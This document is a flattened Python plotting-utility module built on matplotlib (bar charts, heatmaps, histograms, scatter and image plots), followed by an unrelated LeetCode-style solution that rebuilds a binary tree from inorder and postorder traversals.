import matplotlib.pyplot as plt; import sys; import os; scriptsDir = os.environ.get("UTIL_SCRIPTS_DIR"); if (scriptsDir is None): raise Exception("Please set environment variable UTIL_SCRIPTS_DIR"); sys.path.insert(0,scriptsDir); import pathSetter; import util; import fileProcessing as fp; import argparse; import matplotlib.pyplot as plt import numpy as np; from collections import defaultdict class StackedBarChartOptions(object): def __init__(self, stackedSeriesNames, colors): self.stackedSeriesNames=stackedSeriesNames; self.colors=colors; def stackedBarChart(stackedMeans, stackedBarChartOptions, width=0.35, figSize=(10,10)): #stacked data is two-dimensional; first axis is the series, second #axis is the means. cumulativePositiveBottom = np.zeros(stackedMeans.shape[1]); cumulativeNegativeBottom = np.zeros(stackedMeans.shape[1]); ind = np.arange(stackedMeans.shape[1]); plottedArrs = [] plt.figure(figsize=figSize) for (seriesMeans,color) in zip(stackedMeans, stackedBarChartOptions.colors): p = plt.bar(ind, seriesMeans, width, color=color, bottom=cumulativePositiveBottom*(seriesMeans>0)+cumulativeNegativeBottom*(seriesMeans<0)); plottedArrs.append(p) cumulativePositiveBottom += seriesMeans*(seriesMeans>0); cumulativeNegativeBottom += seriesMeans*(seriesMeans<0); plt.legend([x[0] for x in plottedArrs], stackedBarChartOptions.stackedSeriesNames); plt.show() return plt; #an attempt to make matplotlib somewhat as easy as R. def plotHeatmap(data, logTransform=False, zeroCenter=False, cmap=plt.cm.coolwarm, figsize=(15,15)): fig, ax = plt.subplots(figsize=figsize) plotHeatmapGivenAx(ax, data , logTransform=logTransform , zeroCenter=zeroCenter , cmap=cmap); plt.show() return plt; def plotHeatmapGivenAx(ax, data, logTransform=False, zeroCenter=False, cmap=plt.cm.coolwarm): if logTransform: data = np.log(np.abs(data)+1)*np.sign(data); if (zeroCenter): data = data*((data<0)/(1 if np.min(data)==0 else np.abs(np.min(data))) + (data>0)/np.max(data)); ax.pcolor(data, cmap=cmap); return ax; def plotHeatmapSortedByLabels(arr, labels, *args, **kwargs): arrSortedByLabels = util.sortByLabels(arr, labels); countsPerLabel = defaultdict(lambda: 0); for label in labels: countsPerLabel[label] += 1; for label in sorted(countsPerLabel.keys(), key=lambda x: -x): print(label,":",countsPerLabel[label]); plotHeatmap(np.array(arrSortedByLabels), *args, **kwargs); def barplot(data, figsize=None, dashedLine=None, title=""): plt.figure(figsize=figsize); plt.title(title) plt.bar(np.arange(len(data)), data) if (dashedLine is not None): plt.axhline(dashedLine, linestyle='dashed', color='black') plt.show() return plt; def plotHist(data, bins=None, figsize=(7,7), title="", **kwargs): if (bins==None): bins=len(data) plt.figure(figsize=figsize); plt.hist(data,bins=bins, **kwargs) plt.title(title) plt.show() def scatterPlot(xycoords, labels=None, colors=None, figsize=(5,5), xlabel="", ylabel=""): """ If labels is not none, will assign colors using points evenly sampled from Blue -> Violet -> Red -> Yellow -> Green """ import matplotlib.pyplot as plt plt.figure(figsize=figsize) if (labels is None): plt.scatter(xycoords[:,0], xycoords[:,1]) else: if (colors is None): maxLabel = np.max(labels); colors = [util.fracToRainbowColour(x/float(maxLabel)) if x > 0 else util.fracToRainbowColour(0) for x in range(maxLabel+1)]; print("No colors supplied, so autogen'd as:\n"+ "\n".join(str(x) for x in list(enumerate(colors)))) plt.scatter(xycoords[:,0], xycoords[:,1], c=[colors[x] for x in labels]); plt.xlabel(xlabel) plt.ylabel(ylabel) plt.show(); def plotImage(image, dpiMultiplier=2.5): assert len(image.shape)==2 or len(image.shape)==3; if (len(image.shape)==3): assert image.shape[2]==3; dpi = int(20*dpiMultiplier); margin = 0.05 # (5% of the width/height of the figure...) xpixels, ypixels = image.shape[0], image.shape[1] # Make a figure big enough to accomodate an axis of xpixels by ypixels # as well as the ticklabels, etc... figsize = (1 + margin) * ypixels / dpi, (1 + margin) * xpixels / dpi fig = plt.figure(figsize=figsize, dpi=dpi) # Make the axis the right size... ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin]) ax.imshow(image, interpolation='none') plt.show() def plotOneHotEncodingsAsImage(oneHotEncodings, *args, **kwargs): assert len(oneHotEncodings.shape)==3; assert oneHotEncodings.shape[1]==4; rowMaxes = np.max(oneHotEncodings, axis=(1,2)); colors = [(0,1,0), (0,0,1), (1,1,0), (1,0,0)]; image = np.array([[np.array(colors[np.argmax(oneHotEncoding[:,i])])*min(1,np.max(oneHotEncoding[:,i])/0.7)\ if np.max(oneHotEncoding[:,i])>0 else (0,0,0) for i in xrange(oneHotEncoding.shape[1])] for (j,oneHotEncoding) in enumerate(oneHotEncodings)]) plotImage(image, *args, **kwargs);
# Definition for a binary tree node. # class TreeNode(object): # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution(object): def buildTree(self, inorder, postorder): """ :type inorder: List[int] :type postorder: List[int] :rtype: TreeNode """ def construct(iS, iE, pS, pE): if pS > pE: return None index = inorder.index(postorder[pE]) node = TreeNode(postorder[pE]) node.left = construct(iS, index - 1, pS, pS + (index - iS - 1)) node.right = construct(index + 1, iE, pS + (index - iS), pE - 1) return node return construct(0, len(inorder) - 1, 0, len(postorder) - 1)